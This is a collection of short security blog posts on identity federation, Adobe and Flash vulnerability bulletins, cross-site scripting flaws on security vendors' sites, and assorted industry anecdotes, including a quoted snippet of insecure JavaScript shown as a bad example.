Les Jordan from Microsoft recently wrote a blog post entitled Identity Management: a key to seamless CTMS and EDC. In it, he presents some of the solutions Microsoft is introducing in the identity management space, currently under the name of Microsoft Geneva including the Geneva Framework, and the Microsoft Identity Federation Gateway.

The idea is fairly simple. Many (most?) large enterprises already manage their users and systems using Active Directory.  Geneva allows publishing the components of your Active Directory required for doing identity federation on the Internet.  The publishing is performed in a standards-compliant way (using WS-* and SAML 2.0) and allows it to be used for claims between enterprises.

…the issue of Identity Management, Username and Password proliferation, and cross-company collaboration is an issue that has hindered true (and secure) data availability and collaboration in the Life Sciences industry.  Perhaps now we can get the Identity Management issue behind us and move on.

Whether or not Geneva becomes the one standard way to allow interoperable identity management across multiple enterprises in the life sciences space, it is clearly going to lower barriers between organizations and increase our trustworthiness in digital identities.

Adobe has created a survey on their Security Matters blog with a survey for digital signature users to complete.

If you have (and use) an electronic signature credential, and are interested in helping Adobe craft the next generation of Adobe Acrobat, Reader, and LiveCycle products and signature features, we are offering you the ability to participate in an Electronic Signature Survey.

Might be worth filling out, if you want to have a chance to influence the next round of Adobe products, such as Acrobat.

Hot on the heels of a Flash Player critical vulnerability, Adobe has released a security bulletin outlining a critical vulnerability in all Adobe Reader and Acrobat versions prior to version 8.1.3.

Critical vulnerabilities have been identified in Adobe Reader and Acrobat 8.1.2 and earlier versions. These vulnerabilities would cause the application to crash and could potentially allow an attacker to take control of the affected system.

Acrobat and Reader version 9 is not vulnerable to these particular flaws.  A few interesting things to note here. No patch for Acrobat/Reader 7 and earlier has been released. Additionally, the update is available only by moving to a new version of Acrobat/Reader, either version 8.1.3 or 9. This may cause significant pain and stress among organizations that have standardized on Acrobat or Reader, especially in FDA validated systems.  This is because Adobe has not made it possible to just apply a security update patch to the affected software.  Instead, organizations must deploy a new version, which may contain additional changes including a changed user interface, changed behavior, and changed compatibility.  Therefore, I expect some organizations may choose to live with the risk rather than move into a new version, and have to re-document and re-validate processes according to an updated version of Acrobat or Reader.

Adobe has released an advisory about a series of critical vulnerabilities in flash player 9.0.124.0 and earlier.  The fix is to install the just-released flash player 10.0.12.36.  The interesting thing is that the architecture of some security related things has changed wholeheartedly with player 10 – so things that used to work with 9, may stop working with 10.

Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. Due to the possibility that these security enhancements and changes may impact existing content, customers are advised to review this Adobe Developer Center article to determine if their content will be impacted, and to begin implementing necessary changes immediately to help ensure a seamless transition.

The bulletin is here, and the updated player is here.  Happy patching!

From DarkReading.com:

With all the talk about hackers launching attacks from legitimate Websites, you’d think that the major security vendors’ sites, at least, would be vulnerability-free.

Not so, according to a report issued yesterday by a security watchdog site.
The site, XSSed, states that it has verified some 30 cross-site scripting vulnerabilities spread across the Websites of three of the industry’s best-known security vendors: McAfee, Symantec, and VeriSign. The vulnerabilities could make it possible for attackers to launch phishing campaigns from these sites or even distribute malware to the companies’ customers, according to XSSed.

Cross-site scripting vulnerabilities aren’t a new type of threat, and they aren’t particularly difficult to defend against. It seems a little crazy that the companies that many people depend on to help them get a handle on security don’t practice the things that they preach. Or then again, maybe they don’t even preach them:

This isn’t the first time that XSS vulnerabilities have been exposed on sites such as McAfee’s and Symantec’s, notes Jeremiah Grossman, CTO of WhiteHat Security. Back in January, XSSed reported that some 60 sites that had received the “hacker safe” label from McAfee’s ScanAlert service were vulnerable to XSS attacks. (Emphasis added)

I disagree with Grossman’s conclusion, however, that the XSS vulnerabilities on these security companies’ web sites aren’t something to worry about. His argument is that, while these are security companies, they primarily focus on anti-virus and anti-malware software. However, when these companies start handing out “Hacker Safe!” badges to other web sites (which, in my opinion, is like throwing rocks at a beehive), they put themselves in an arena in which things like simple XSS vulnerabilities cannot be overlooked. I believe that the “more important” sites that are mentioned, such as bank and e-commerce web sites, are really unlikely to have their security problems taken care of before the people that are supposed to “know security” do.

From the press release:

“We are pleased to be given this opportunity to be directly supporting SAFE’s mission of delivering unique electronic identity credentials for legally enforceable and regulatory compliant digital signatures across the global biopharmaceutical environment,” said Peter Hesse, President and Founder, Gemini Security Solutions. “We have focused significant energy toward helping corporations realize the benefits of digital signatures and identity management standards to safeguard critical information. We are excited to be recognized both as a SAFE partner and a trusted technical expert.”

We are glad to officially be a part of the SAFE community. While we have been involved in SAFE since its inception, we are now playing a greater part in the development and adoption of secure standards for the biopharmaceutical industry.

The folks over at the daily wtf have an amusing story about trying to determine if a sales pitch was worth it.

Since there’s really only one thing that could cause such a dialog to pop-up so fast, I checked the source code…

if (form.id.value=="buyers") {
if (form.pass.value=="gov1996") {
location="http://officers.federalsuppliers.com/agents.html" }

Even if you don’t understand Javascript, you can probably appreciate how terrible this implementation is…

This is great. We covered Microsoft OneCare when it was first announced and again when Vista was nearing release. Now comes news from SecurityFocus that Microsoft OneCare deleted Outlook e-mails…

Recent reports suggest Microsoft’s OneCare anti-virus offering suffered a bug that could have caused it to delete or quarantine all e-mail in a user’s Outlook inbox, in certain cases when it finds a virus.

Well isn’t that nice. You have a spam/virus email in your PST, so to get rid of it, we’ll just delete the entire PST file. Yikes. Glad they didn’t include it in Vista as Anil had suggested.

Taking profiteering to a new level:

I got hacked by my own host. No, it wasn’t a mistake. No, the server didn’t just go down. They hacked it so that they could upsell me on some $2000 security audit and package!

“They” seems to be the malicious action of one individual who part-timed on support for the hosting provider and worked at a security consulting firm. Interesting (but illegal) way of drumming up business…

Every software developer has done this at one point in time… You fix a bug but in the process, introduce a new one.

Well, it sucks when the bug you are fixing is actually a cumulative patch for eight security vulnerabilities, and the bug you introduce is a security vulnerability that is as severe as worst of the eight you fixed.

Oh well, here’s hoping they get this one worked out before exploits show up in the wild.